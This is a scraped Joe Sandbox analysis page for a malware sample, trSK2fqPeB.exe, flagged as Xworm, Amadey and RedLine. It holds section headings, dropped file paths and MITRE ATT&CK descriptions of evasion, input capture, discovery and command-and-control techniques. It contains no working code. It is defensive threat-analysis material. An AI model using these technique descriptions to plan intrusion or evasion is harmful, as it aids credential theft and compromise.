Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report trSK2fqPeB.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Threatname: Amadey

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Bitcoin Miner

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe

C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe

C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

Windows Analysis Report
trSK2fqPeB.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre